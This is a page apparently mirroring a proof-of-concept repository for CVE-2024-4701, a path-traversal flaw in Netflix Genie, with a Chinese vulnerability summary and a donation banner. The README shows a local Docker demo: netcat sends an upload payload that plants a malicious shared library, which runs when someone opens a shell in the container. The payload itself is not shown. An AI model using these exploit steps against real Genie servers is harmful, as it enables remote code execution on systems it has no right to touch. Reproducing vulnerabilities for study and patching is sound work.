Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-4701 PoC — Netflix Genie 路径遍历漏洞

Source
Associated Vulnerability
Title:Netflix Genie 路径遍历漏洞 (CVE-2024-4701)
Description:Netflix Genie是美国Netflix公司的一个联合大数据编排和执行引擎。 Netflix Genie 4.3.18之前版本存在路径遍历漏洞,该漏洞源于存在路径遍历问题,可能导致远程执行代码。
Description
POC for CVE-2024-4701
Readme
# CVE-2024-4701-POC
POC for CVE-2024-4701

Download the genie docker file from https://netflix.github.io/genie/docs/4.3.0/demo/docker-compose.yml or this repo

run 

```docker-compose up```

Download the attached http payload loadlib 

Run the following command

```nc -w 5 localhost 8080 < loadlib```
You may need to install netcat ( nc )

This will send the payload to the genie app running in docker, which uploads the pe.so and ld.so.upload files.

Then login to the genie-app docker container

```docker exec -it genie_demo_app_4.3.0 /bin/bash```

The act of logging in triggers the execution of the malicious library, so just then run

ls /tmp/

To see the file command.out written to disk.

File Snapshot

[4.0K] /data/pocs/970118fe315fa615974ab6c2470390288fa6d9a8 ├── [1.4K] docker-compose.yaml ├── [ 11K] LICENSE ├── [ 16K] loadlib └── [ 698] README.md 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.